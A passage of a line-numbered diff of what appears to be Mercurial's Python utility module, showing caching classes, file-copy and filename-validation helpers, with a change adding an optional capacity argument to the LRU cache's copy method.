998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keywords args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220
1221 1221 def markempty(self):
1222 1222 """Mark the node as emptied."""
1223 1223 self.key = _notset
1224 1224
1225 1225 class lrucachedict(object):
1226 1226 """Dict that caches most recent accesses and sets.
1227 1227
1228 1228 The dict consists of an actual backing dict - indexed by original
1229 1229 key - and a doubly linked circular list defining the order of entries in
1230 1230 the cache.
1231 1231
1232 1232 The head node is the newest entry in the cache. If the cache is full,
1233 1233 we recycle head.prev and make it the new head. Cache accesses result in
1234 1234 the node being moved to before the existing head and being marked as the
1235 1235 new head node.
1236 1236 """
1237 1237 def __init__(self, max):
1238 1238 self._cache = {}
1239 1239
1240 1240 self._head = head = _lrucachenode()
1241 1241 head.prev = head
1242 1242 head.next = head
1243 1243 self._size = 1
1244 1244 self.capacity = max
1245 1245
1246 1246 def __len__(self):
1247 1247 return len(self._cache)
1248 1248
1249 1249 def __contains__(self, k):
1250 1250 return k in self._cache
1251 1251
1252 1252 def __iter__(self):
1253 1253 # We don't have to iterate in cache order, but why not.
1254 1254 n = self._head
1255 1255 for i in range(len(self._cache)):
1256 1256 yield n.key
1257 1257 n = n.next
1258 1258
1259 1259 def __getitem__(self, k):
1260 1260 node = self._cache[k]
1261 1261 self._movetohead(node)
1262 1262 return node.value
1263 1263
1264 1264 def __setitem__(self, k, v):
1265 1265 node = self._cache.get(k)
1266 1266 # Replace existing value and mark as newest.
1267 1267 if node is not None:
1268 1268 node.value = v
1269 1269 self._movetohead(node)
1270 1270 return
1271 1271
1272 1272 if self._size < self.capacity:
1273 1273 node = self._addcapacity()
1274 1274 else:
1275 1275 # Grab the last/oldest item.
1276 1276 node = self._head.prev
1277 1277
1278 1278 # At capacity. Kill the old entry.
1279 1279 if node.key is not _notset:
1280 1280 del self._cache[node.key]
1281 1281
1282 1282 node.key = k
1283 1283 node.value = v
1284 1284 self._cache[k] = node
1285 1285 # And mark it as newest entry. No need to adjust order since it
1286 1286 # is already self._head.prev.
1287 1287 self._head = node
1288 1288
1289 1289 def __delitem__(self, k):
1290 1290 node = self._cache.pop(k)
1291 1291 node.markempty()
1292 1292
1293 1293 # Temporarily mark as newest item before re-adjusting head to make
1294 1294 # this node the oldest item.
1295 1295 self._movetohead(node)
1296 1296 self._head = node.next
1297 1297
1298 1298 # Additional dict methods.
1299 1299
1300 1300 def get(self, k, default=None):
1301 1301 try:
1302 1302 return self._cache[k].value
1303 1303 except KeyError:
1304 1304 return default
1305 1305
1306 1306 def clear(self):
1307 1307 n = self._head
1308 1308 while n.key is not _notset:
1309 1309 n.markempty()
1310 1310 n = n.next
1311 1311
1312 1312 self._cache.clear()
1313 1313
1314 def copy(self):
1315 result = lrucachedict(self.capacity)
1314 def copy(self, capacity=None):
1315 """Create a new cache as a copy of the current one.
1316
1317 By default, the new cache has the same capacity as the existing one.
1318 But, the cache capacity can be changed as part of performing the
1319 copy.
1320
1321 Items in the copy have an insertion/access order matching this
1322 instance.
1323 """
1324
1325 capacity = capacity or self.capacity
1326 result = lrucachedict(capacity)
1316 1327
1317 1328 # We copy entries by iterating in oldest-to-newest order so the copy
1318 1329 # has the correct ordering.
1319 1330
1320 1331 # Find the first non-empty entry.
1321 1332 n = self._head.prev
1322 1333 while n.key is _notset and n is not self._head:
1323 1334 n = n.prev
1324 1335
1336 # We could potentially skip the first N items when decreasing capacity.
1337 # But let's keep it simple unless it is a performance problem.
1325 1338 for i in range(len(self._cache)):
1326 1339 result[n.key] = n.value
1327 1340 n = n.prev
1328 1341
1329 1342 return result
1330 1343
1331 1344 def _movetohead(self, node):
1332 1345 """Mark a node as the newest, making it the new head.
1333 1346
1334 1347 When a node is accessed, it becomes the freshest entry in the LRU
1335 1348 list, which is denoted by self._head.
1336 1349
1337 1350 Visually, let's make ``N`` the new head node (* denotes head):
1338 1351
1339 1352 previous/oldest <-> head <-> next/next newest
1340 1353
1341 1354 ----<->--- A* ---<->-----
1342 1355 | |
1343 1356 E <-> D <-> N <-> C <-> B
1344 1357
1345 1358 To:
1346 1359
1347 1360 ----<->--- N* ---<->-----
1348 1361 | |
1349 1362 E <-> D <-> C <-> B <-> A
1350 1363
1351 1364 This requires the following moves:
1352 1365
1353 1366 C.next = D (node.prev.next = node.next)
1354 1367 D.prev = C (node.next.prev = node.prev)
1355 1368 E.next = N (head.prev.next = node)
1356 1369 N.prev = E (node.prev = head.prev)
1357 1370 N.next = A (node.next = head)
1358 1371 A.prev = N (head.prev = node)
1359 1372 """
1360 1373 head = self._head
1361 1374 # C.next = D
1362 1375 node.prev.next = node.next
1363 1376 # D.prev = C
1364 1377 node.next.prev = node.prev
1365 1378 # N.prev = E
1366 1379 node.prev = head.prev
1367 1380 # N.next = A
1368 1381 # It is tempting to do just "head" here, however if node is
1369 1382 # adjacent to head, this will do bad things.
1370 1383 node.next = head.prev.next
1371 1384 # E.next = N
1372 1385 node.next.prev = node
1373 1386 # A.prev = N
1374 1387 node.prev.next = node
1375 1388
1376 1389 self._head = node
1377 1390
1378 1391 def _addcapacity(self):
1379 1392 """Add a node to the circular linked list.
1380 1393
1381 1394 The new node is inserted before the head node.
1382 1395 """
1383 1396 head = self._head
1384 1397 node = _lrucachenode()
1385 1398 head.prev.next = node
1386 1399 node.prev = head.prev
1387 1400 node.next = head
1388 1401 head.prev = node
1389 1402 self._size += 1
1390 1403 return node
1391 1404
1392 1405 def lrucachefunc(func):
1393 1406 '''cache most recent results of function calls'''
1394 1407 cache = {}
1395 1408 order = collections.deque()
1396 1409 if func.__code__.co_argcount == 1:
1397 1410 def f(arg):
1398 1411 if arg not in cache:
1399 1412 if len(cache) > 20:
1400 1413 del cache[order.popleft()]
1401 1414 cache[arg] = func(arg)
1402 1415 else:
1403 1416 order.remove(arg)
1404 1417 order.append(arg)
1405 1418 return cache[arg]
1406 1419 else:
1407 1420 def f(*args):
1408 1421 if args not in cache:
1409 1422 if len(cache) > 20:
1410 1423 del cache[order.popleft()]
1411 1424 cache[args] = func(*args)
1412 1425 else:
1413 1426 order.remove(args)
1414 1427 order.append(args)
1415 1428 return cache[args]
1416 1429
1417 1430 return f
1418 1431
1419 1432 class propertycache(object):
1420 1433 def __init__(self, func):
1421 1434 self.func = func
1422 1435 self.name = func.__name__
1423 1436 def __get__(self, obj, type=None):
1424 1437 result = self.func(obj)
1425 1438 self.cachevalue(obj, result)
1426 1439 return result
1427 1440
1428 1441 def cachevalue(self, obj, value):
1429 1442 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1430 1443 obj.__dict__[self.name] = value
1431 1444
1432 1445 def clearcachedproperty(obj, prop):
1433 1446 '''clear a cached property value, if one has been set'''
1434 1447 if prop in obj.__dict__:
1435 1448 del obj.__dict__[prop]
1436 1449
1437 1450 def increasingchunks(source, min=1024, max=65536):
1438 1451 '''return no less than min bytes per chunk while data remains,
1439 1452 doubling min after each chunk until it reaches max'''
1440 1453 def log2(x):
1441 1454 if not x:
1442 1455 return 0
1443 1456 i = 0
1444 1457 while x:
1445 1458 x >>= 1
1446 1459 i += 1
1447 1460 return i - 1
1448 1461
1449 1462 buf = []
1450 1463 blen = 0
1451 1464 for chunk in source:
1452 1465 buf.append(chunk)
1453 1466 blen += len(chunk)
1454 1467 if blen >= min:
1455 1468 if min < max:
1456 1469 min = min << 1
1457 1470 nmin = 1 << log2(blen)
1458 1471 if nmin > min:
1459 1472 min = nmin
1460 1473 if min > max:
1461 1474 min = max
1462 1475 yield ''.join(buf)
1463 1476 blen = 0
1464 1477 buf = []
1465 1478 if buf:
1466 1479 yield ''.join(buf)
1467 1480
1468 1481 def always(fn):
1469 1482 return True
1470 1483
1471 1484 def never(fn):
1472 1485 return False
1473 1486
1474 1487 def nogc(func):
1475 1488 """disable garbage collector
1476 1489
1477 1490 Python's garbage collector triggers a GC each time a certain number of
1478 1491 container objects (the number being defined by gc.get_threshold()) are
1479 1492 allocated even when marked not to be tracked by the collector. Tracking has
1480 1493 no effect on when GCs are triggered, only on what objects the GC looks
1481 1494 into. As a workaround, disable GC while building complex (huge)
1482 1495 containers.
1483 1496
1484 1497 This garbage collector issue have been fixed in 2.7. But it still affect
1485 1498 CPython's performance.
1486 1499 """
1487 1500 def wrapper(*args, **kwargs):
1488 1501 gcenabled = gc.isenabled()
1489 1502 gc.disable()
1490 1503 try:
1491 1504 return func(*args, **kwargs)
1492 1505 finally:
1493 1506 if gcenabled:
1494 1507 gc.enable()
1495 1508 return wrapper
1496 1509
1497 1510 if pycompat.ispypy:
1498 1511 # PyPy runs slower with gc disabled
1499 1512 nogc = lambda x: x
1500 1513
1501 1514 def pathto(root, n1, n2):
1502 1515 '''return the relative path from one place to another.
1503 1516 root should use os.sep to separate directories
1504 1517 n1 should use os.sep to separate directories
1505 1518 n2 should use "/" to separate directories
1506 1519 returns an os.sep-separated path.
1507 1520
1508 1521 If n1 is a relative path, it's assumed it's
1509 1522 relative to root.
1510 1523 n2 should always be relative to root.
1511 1524 '''
1512 1525 if not n1:
1513 1526 return localpath(n2)
1514 1527 if os.path.isabs(n1):
1515 1528 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1516 1529 return os.path.join(root, localpath(n2))
1517 1530 n2 = '/'.join((pconvert(root), n2))
1518 1531 a, b = splitpath(n1), n2.split('/')
1519 1532 a.reverse()
1520 1533 b.reverse()
1521 1534 while a and b and a[-1] == b[-1]:
1522 1535 a.pop()
1523 1536 b.pop()
1524 1537 b.reverse()
1525 1538 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1526 1539
1527 1540 # the location of data files matching the source code
1528 1541 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1529 1542 # executable version (py2exe) doesn't support __file__
1530 1543 datapath = os.path.dirname(pycompat.sysexecutable)
1531 1544 else:
1532 1545 datapath = os.path.dirname(pycompat.fsencode(__file__))
1533 1546
1534 1547 i18n.setdatapath(datapath)
1535 1548
1536 1549 def checksignature(func):
1537 1550 '''wrap a function with code to check for calling errors'''
1538 1551 def check(*args, **kwargs):
1539 1552 try:
1540 1553 return func(*args, **kwargs)
1541 1554 except TypeError:
1542 1555 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1543 1556 raise error.SignatureError
1544 1557 raise
1545 1558
1546 1559 return check
1547 1560
1548 1561 # a whilelist of known filesystems where hardlink works reliably
1549 1562 _hardlinkfswhitelist = {
1550 1563 'apfs',
1551 1564 'btrfs',
1552 1565 'ext2',
1553 1566 'ext3',
1554 1567 'ext4',
1555 1568 'hfs',
1556 1569 'jfs',
1557 1570 'NTFS',
1558 1571 'reiserfs',
1559 1572 'tmpfs',
1560 1573 'ufs',
1561 1574 'xfs',
1562 1575 'zfs',
1563 1576 }
1564 1577
1565 1578 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1566 1579 '''copy a file, preserving mode and optionally other stat info like
1567 1580 atime/mtime
1568 1581
1569 1582 checkambig argument is used with filestat, and is useful only if
1570 1583 destination file is guarded by any lock (e.g. repo.lock or
1571 1584 repo.wlock).
1572 1585
1573 1586 copystat and checkambig should be exclusive.
1574 1587 '''
1575 1588 assert not (copystat and checkambig)
1576 1589 oldstat = None
1577 1590 if os.path.lexists(dest):
1578 1591 if checkambig:
1579 1592 oldstat = checkambig and filestat.frompath(dest)
1580 1593 unlink(dest)
1581 1594 if hardlink:
1582 1595 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1583 1596 # unless we are confident that dest is on a whitelisted filesystem.
1584 1597 try:
1585 1598 fstype = getfstype(os.path.dirname(dest))
1586 1599 except OSError:
1587 1600 fstype = None
1588 1601 if fstype not in _hardlinkfswhitelist:
1589 1602 hardlink = False
1590 1603 if hardlink:
1591 1604 try:
1592 1605 oslink(src, dest)
1593 1606 return
1594 1607 except (IOError, OSError):
1595 1608 pass # fall back to normal copy
1596 1609 if os.path.islink(src):
1597 1610 os.symlink(os.readlink(src), dest)
1598 1611 # copytime is ignored for symlinks, but in general copytime isn't needed
1599 1612 # for them anyway
1600 1613 else:
1601 1614 try:
1602 1615 shutil.copyfile(src, dest)
1603 1616 if copystat:
1604 1617 # copystat also copies mode
1605 1618 shutil.copystat(src, dest)
1606 1619 else:
1607 1620 shutil.copymode(src, dest)
1608 1621 if oldstat and oldstat.stat:
1609 1622 newstat = filestat.frompath(dest)
1610 1623 if newstat.isambig(oldstat):
1611 1624 # stat of copied file is ambiguous to original one
1612 1625 advanced = (
1613 1626 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1614 1627 os.utime(dest, (advanced, advanced))
1615 1628 except shutil.Error as inst:
1616 1629 raise error.Abort(str(inst))
1617 1630
1618 1631 def copyfiles(src, dst, hardlink=None, progress=None):
1619 1632 """Copy a directory tree using hardlinks if possible."""
1620 1633 num = 0
1621 1634
1622 1635 def settopic():
1623 1636 if progress:
1624 1637 progress.topic = _('linking') if hardlink else _('copying')
1625 1638
1626 1639 if os.path.isdir(src):
1627 1640 if hardlink is None:
1628 1641 hardlink = (os.stat(src).st_dev ==
1629 1642 os.stat(os.path.dirname(dst)).st_dev)
1630 1643 settopic()
1631 1644 os.mkdir(dst)
1632 1645 for name, kind in listdir(src):
1633 1646 srcname = os.path.join(src, name)
1634 1647 dstname = os.path.join(dst, name)
1635 1648 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1636 1649 num += n
1637 1650 else:
1638 1651 if hardlink is None:
1639 1652 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1640 1653 os.stat(os.path.dirname(dst)).st_dev)
1641 1654 settopic()
1642 1655
1643 1656 if hardlink:
1644 1657 try:
1645 1658 oslink(src, dst)
1646 1659 except (IOError, OSError):
1647 1660 hardlink = False
1648 1661 shutil.copy(src, dst)
1649 1662 else:
1650 1663 shutil.copy(src, dst)
1651 1664 num += 1
1652 1665 if progress:
1653 1666 progress.increment()
1654 1667
1655 1668 return hardlink, num
1656 1669
1657 1670 _winreservednames = {
1658 1671 'con', 'prn', 'aux', 'nul',
1659 1672 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1660 1673 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1661 1674 }
1662 1675 _winreservedchars = ':*?"<>|'
1663 1676 def checkwinfilename(path):
1664 1677 r'''Check that the base-relative path is a valid filename on Windows.
1665 1678 Returns None if the path is ok, or a UI string describing the problem.
1666 1679
1667 1680 >>> checkwinfilename(b"just/a/normal/path")
1668 1681 >>> checkwinfilename(b"foo/bar/con.xml")
1669 1682 "filename contains 'con', which is reserved on Windows"
1670 1683 >>> checkwinfilename(b"foo/con.xml/bar")
1671 1684 "filename contains 'con', which is reserved on Windows"
1672 1685 >>> checkwinfilename(b"foo/bar/xml.con")
1673 1686 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1674 1687 "filename contains 'AUX', which is reserved on Windows"
1675 1688 >>> checkwinfilename(b"foo/bar/bla:.txt")
1676 1689 "filename contains ':', which is reserved on Windows"
1677 1690 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1678 1691 "filename contains '\\x07', which is invalid on Windows"
1679 1692 >>> checkwinfilename(b"foo/bar/bla ")
1680 1693 "filename ends with ' ', which is not allowed on Windows"
1681 1694 >>> checkwinfilename(b"../bar")
1682 1695 >>> checkwinfilename(b"foo\\")
1683 1696 "filename ends with '\\', which is invalid on Windows"
1684 1697 >>> checkwinfilename(b"foo\\/bar")
1685 1698 "directory name ends with '\\', which is invalid on Windows"
1686 1699 '''
1687 1700 if path.endswith('\\'):
1688 1701 return _("filename ends with '\\', which is invalid on Windows")
1689 1702 if '\\/' in path:
1690 1703 return _("directory name ends with '\\', which is invalid on Windows")
1691 1704 for n in path.replace('\\', '/').split('/'):
1692 1705 if not n:
1693 1706 continue
1694 1707 for c in _filenamebytestr(n):
1695 1708 if c in _winreservedchars:
1696 1709 return _("filename contains '%s', which is reserved "
1697 1710 "on Windows") % c
1698 1711 if ord(c) <= 31:
1699 1712 return _("filename contains '%s', which is invalid "
1700 1713 "on Windows") % stringutil.escapestr(c)
1701 1714 base = n.split('.')[0]
1702 1715 if base and base.lower() in _winreservednames:
1703 1716 return _("filename contains '%s', which is reserved "
1704 1717 "on Windows") % base
1705 1718 t = n[-1:]
1706 1719 if t in '. ' and n not in '..':
1707 1720 return _("filename ends with '%s', which is not allowed "
1708 1721 "on Windows") % t
1709 1722
1710 1723 if pycompat.iswindows:
1711 1724 checkosfilename = checkwinfilename
1712 1725 timer = time.clock
1713 1726 else:
1714 1727 checkosfilename = platform.checkosfilename
1715 1728 timer = time.time
1716 1729
1717 1730 if safehasattr(time, "perf_counter"):
1718 1731 timer = time.perf_counter
1719 1732
1720 1733 def makelock(info, pathname):
1721 1734 """Create a lock file atomically if possible
1722 1735
1723 1736 This may leave a stale lock file if symlink isn't supported and signal
1724 1737 interrupt is enabled.
1725 1738 """
1726 1739 try:
1727 1740 return os.symlink(info, pathname)
1728 1741 except OSError as why:
1729 1742 if why.errno == errno.EEXIST:
1730 1743 raise
1731 1744 except AttributeError: # no symlink in os
1732 1745 pass
1733 1746
1734 1747 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1735 1748 ld = os.open(pathname, flags)
1736 1749 os.write(ld, info)
1737 1750 os.close(ld)
1738 1751
1739 1752 def readlock(pathname):
1740 1753 try:
1741 1754 return os.readlink(pathname)
1742 1755 except OSError as why:
1743 1756 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1744 1757 raise
1745 1758 except AttributeError: # no symlink in os
1746 1759 pass
1747 1760 fp = posixfile(pathname, 'rb')
1748 1761 r = fp.read()
1749 1762 fp.close()
1750 1763 return r
1751 1764
1752 1765 def fstat(fp):
1753 1766 '''stat file object that may not have fileno method.'''
1754 1767 try:
1755 1768 return os.fstat(fp.fileno())
1756 1769 except AttributeError:
1757 1770 return os.stat(fp.name)
1758 1771
1759 1772 # File system features
1760 1773
1761 1774 def fscasesensitive(path):
1762 1775 """
1763 1776 Return true if the given path is on a case-sensitive filesystem
1764 1777
1765 1778 Requires a path (like /foo/.hg) ending with a foldable final
1766 1779 directory component.
1767 1780 """
1768 1781 s1 = os.lstat(path)
1769 1782 d, b = os.path.split(path)
1770 1783 b2 = b.upper()
1771 1784 if b == b2:
1772 1785 b2 = b.lower()
1773 1786 if b == b2:
1774 1787 return True # no evidence against case sensitivity
1775 1788 p2 = os.path.join(d, b2)
1776 1789 try:
1777 1790 s2 = os.lstat(p2)
1778 1791 if s2 == s1:
1779 1792 return False
1780 1793 return True
1781 1794 except OSError:
1782 1795 return True
1783 1796
1784 1797 try:
1785 1798 import re2
1786 1799 _re2 = None
1787 1800 except ImportError:
1788 1801 _re2 = False
1789 1802
1790 1803 class _re(object):
1791 1804 def _checkre2(self):
1792 1805 global _re2
1793 1806 try:
1794 1807 # check if match works, see issue3964
1795 1808 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1796 1809 except ImportError:
1797 1810 _re2 = False
1798 1811
1799 1812 def compile(self, pat, flags=0):
1800 1813 '''Compile a regular expression, using re2 if possible
1801 1814
1802 1815 For best performance, use only re2-compatible regexp features. The
1803 1816 only flags from the re module that are re2-compatible are
1804 1817 IGNORECASE and MULTILINE.'''
1805 1818 if _re2 is None:
1806 1819 self._checkre2()
1807 1820 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1808 1821 if flags & remod.IGNORECASE:
1809 1822 pat = '(?i)' + pat
1810 1823 if flags & remod.MULTILINE:
1811 1824 pat = '(?m)' + pat
1812 1825 try:
1813 1826 return re2.compile(pat)
1814 1827 except re2.error:
1815 1828 pass
1816 1829 return remod.compile(pat, flags)
1817 1830
1818 1831 @propertycache
1819 1832 def escape(self):
1820 1833 '''Return the version of escape corresponding to self.compile.
1821 1834
1822 1835 This is imperfect because whether re2 or re is used for a particular
1823 1836 function depends on the flags, etc, but it's the best we can do.
1824 1837 '''
1825 1838 global _re2
1826 1839 if _re2 is None:
1827 1840 self._checkre2()
1828 1841 if _re2:
1829 1842 return re2.escape
1830 1843 else:
1831 1844 return remod.escape
1832 1845
1833 1846 re = _re()
1834 1847
1835 1848 _fspathcache = {}
1836 1849 def fspath(name, root):
1837 1850 '''Get name in the case stored in the filesystem
1838 1851
1839 1852 The name should be relative to root, and be normcase-ed for efficiency.
1840 1853
1841 1854 Note that this function is unnecessary, and should not be
1842 1855 called, for case-sensitive filesystems (simply because it's expensive).
1843 1856
1844 1857 The root should be normcase-ed, too.
1845 1858 '''
1846 1859 def _makefspathcacheentry(dir):
1847 1860 return dict((normcase(n), n) for n in os.listdir(dir))
1848 1861
1849 1862 seps = pycompat.ossep
1850 1863 if pycompat.osaltsep:
1851 1864 seps = seps + pycompat.osaltsep
1852 1865 # Protect backslashes. This gets silly very quickly.
1853 1866 seps.replace('\\','\\\\')
1854 1867 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1855 1868 dir = os.path.normpath(root)
1856 1869 result = []
1857 1870 for part, sep in pattern.findall(name):
1858 1871 if sep:
1859 1872 result.append(sep)
1860 1873 continue
1861 1874
1862 1875 if dir not in _fspathcache:
1863 1876 _fspathcache[dir] = _makefspathcacheentry(dir)
1864 1877 contents = _fspathcache[dir]
1865 1878
1866 1879 found = contents.get(part)
1867 1880 if not found:
1868 1881 # retry "once per directory" per "dirstate.walk" which
1869 1882 # may take place for each patches of "hg qpush", for example
1870 1883 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1871 1884 found = contents.get(part)
1872 1885
1873 1886 result.append(found or part)
1874 1887 dir = os.path.join(dir, part)
1875 1888
1876 1889 return ''.join(result)
1877 1890
1878 1891 def checknlink(testfile):
1879 1892 '''check whether hardlink count reporting works properly'''
1880 1893
1881 1894 # testfile may be open, so we need a separate file for checking to
1882 1895 # work around issue2543 (or testfile may get lost on Samba shares)
1883 1896 f1, f2, fp = None, None, None
1884 1897 try:
1885 1898 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1886 1899 suffix='1~', dir=os.path.dirname(testfile))
1887 1900 os.close(fd)
1888 1901 f2 = '%s2~' % f1[:-2]
1889 1902
1890 1903 oslink(f1, f2)
1891 1904 # nlinks() may behave differently for files on Windows shares if
1892 1905 # the file is open.
1893 1906 fp = posixfile(f2)
1894 1907 return nlinks(f2) > 1
1895 1908 except OSError:
1896 1909 return False
1897 1910 finally:
1898 1911 if fp is not None:
1899 1912 fp.close()
1900 1913 for f in (f1, f2):
1901 1914 try:
1902 1915 if f is not None:
1903 1916 os.unlink(f)
1904 1917 except OSError:
1905 1918 pass
1906 1919
1907 1920 def endswithsep(path):
1908 1921 '''Check path ends with os.sep or os.altsep.'''
1909 1922 return (path.endswith(pycompat.ossep)
1910 1923 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1911 1924
1912 1925 def splitpath(path):
1913 1926 '''Split path by os.sep.
1914 1927 Note that this function does not use os.altsep because this is
